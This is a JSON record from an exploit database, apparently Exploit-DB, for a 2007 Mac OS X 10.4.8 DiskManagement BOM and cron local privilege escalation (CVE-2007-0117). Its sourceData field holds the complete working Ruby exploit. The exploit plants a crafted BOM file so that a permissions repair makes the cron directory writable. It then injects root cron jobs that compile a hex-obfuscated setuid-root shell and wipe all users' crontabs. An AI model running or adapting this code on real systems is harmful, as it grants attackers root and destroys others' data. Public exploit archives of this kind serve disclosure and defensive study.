{"id": "EDB-ID:3088", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Apple Mac OSX 10.4.8 - DiskManagement BOM 'cron' Local Privilege Escalation", "description": "", "published": "2007-01-05T00:00:00", "modified": "2007-01-05T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/3088", "reporter": "MoAB", "references": [], "cvelist": ["2007-0117"], "immutableFields": [], "lastseen": "2022-08-16T07:01:35", "viewCount": 17, "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "_state": {"dependencies": 1661182887, "score": 1661176728}, "_internal": {"score_hash": "81c1d4a5395c6cb60df4a27fe71a2367"}, "sourceHref": "https://www.exploit-db.com/download/3088", "sourceData": "#!/usr/bin/ruby\r\n# (c) 2006 LMH <lmh [at] info-pull.com> (code from the other exploit, porting)\r\n# Kevin Finisterre <kf_lists [at] digitalmunition.com> (crontab rock and roll)\r\n#\r\n# Second exploit for MOAB-05-01-2007, uses crontab. much more simple than the other one.\r\n# And works like a charm.\r\n\r\nrequire 'fileutils'\r\n\r\nEVIL_COMMANDS = [\r\n\t\t \"rm /Library/Receipts/Essentials.pkg/Contents/Archive.bom \",\r\n\t\t \"echo -e \\\"\\\\x6d\\\\x61\\\\x69\\\\x6e\\\\x28\\\\x29\\\\x7b\\\\x20\\\\x73\\\\x65\\\\x74\\\\x65\\\\x75\\\\x69\\\\x64\\\\x28\\\\x30\\\\x29\\\\x3b\\\\x20\\\\x73\\\\x65\\\\x74\\\\x65\\\\x67\\\\x69\\\\x64\\\\x28\\\\x30\\\\x29\\\\x3b\\\\x20\\\\x73\\\\x65\\\\x74\\\\x75\\\\x69\\\\x64\\\\x28\\\\x30\\\\x29\\\\x3b\\\\x20\\\\x73\\\\x65\\\\x74\\\\x67\\\\x69\\\\x64\\\\x28\\\\x30\\\\x29\\\\x3b\\\\x20\\\\x73\\\\x79\\\\x73\\\\x74\\\\x65\\\\x6d\\\\x28\\\\x22\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x73\\\\x68\\\\x20\\\\x2d\\\\x69\\\\x22\\\\x29\\\\x3b\\\\x20\\\\x7d\\\\x0a\\\" > /tmp/finisterre.c\",\r\n\t\t \"/usr/bin/cc -o /Users/Shared/shX /tmp/finisterre.c; rm /tmp/finisterre.c\",\r\n \"/bin/cp -r /var/cron/tabs /Users/Shared\", # I have no legit crontabs so I don't care. \r\n \"/usr/bin/say Flavor Flave a k a `whoami` && sleep 5 && /usr/bin/say sleeping briefly && sleep 5 && chmod +s /Users/Shared/shX && sleep 5\", \r\n\t\t \"echo '' > /tmp/pwnclean\",\r\n \"for each in `ls /var/cron/tabs/`; do crontab -u $each /tmp/pwnclean; done\", # Sorry if you had any legit crontabs...\r\n\t\t \"crontab /tmp/pwnclean\", # Just to make sure\r\n\t\t \"rm -rf /tmp/pwn*\",\t\r\n ]\r\nTARGET_BOM_PATH = \"/Library/Receipts/Essentials.pkg/Contents/Archive.bom\"\r\nSHELL_TEMPLATE = \"mkdir -p /tmp/pwndertino/var/cron/tabs\\n\" +\r\n \"cd /tmp/pwndertino\\n\" +\r\n \"chmod 777 var/cron/tabs\\n\" +\r\n \"mkbom . /tmp/pwned.bom\\n\" +\r\n \"cp /tmp/pwned.bom #{TARGET_BOM_PATH}\\n\" +\r\n \"/usr/sbin/diskutil repairPermissions /\\n\"\r\n\r\nif ARGV[0] != \"repair\"\r\n # Backup if its there! Some times it is not. \r\n if File.exists?(TARGET_BOM_PATH)\r\n FileUtils.cp(TARGET_BOM_PATH, File.join(\"/Users/Shared\", File.basename(TARGET_BOM_PATH)))\r\n end\r\n \r\n puts \"++ Dropping the 31337 .sh skillz\"\r\n shell_script = File.new(\"moab5.sh\", \"w\")\r\n shell_script.print(SHELL_TEMPLATE)\r\n\r\n puts \"++ Fixing up crontabs\"\r\n \r\n EVIL_COMMANDS.each do |cmd|\r\n shell_script.print(\"echo '* * * * * #{cmd}' >> /var/cron/tabs/root\\n\")\r\n end\r\n\r\n \r\n shell_script.print(\"echo '* * * * * /bin/rm -rf /tmp/pwned.bom /tmp/pwndertino' >> /tmp/pwncron\\n\")\r\n shell_script.print(\"crontab /tmp/pwncron\\n\") # You may need to sleep here\r\n \r\n shell_script.close\r\n puts \"++ Execute moab5.sh\"\r\n FileUtils.chmod 0755, \"./moab5.sh\" \r\n exec \"/bin/sh\", \"-c\", \"./moab5.sh\"\r\n puts \"++ Run the repair script when you are all done.\"\r\nelse\r\n\r\n # minor repair for a post-testing scenario\r\n if File.exists?(File.join(\"/Users/Shared\", File.basename(TARGET_BOM_PATH)))\r\n FileUtils.cp(File.join(\"/Users/Shared\", File.basename(TARGET_BOM_PATH)), TARGET_BOM_PATH) # restore backup\r\n FileUtils.rm_f(File.join(\"/Users/Shared\", File.basename(TARGET_BOM_PATH)))\r\n exec \"/usr/sbin/diskutil repairPermissions /\"\r\n\r\n else\r\n exec \"/usr/sbin/diskutil repairPermissions /\"\r\n end\r\n \r\nend\r\n\r\n# milw0rm.com [2007-01-05]", "osvdbidlist": [], "exploitType": "local", "verified": true}
{}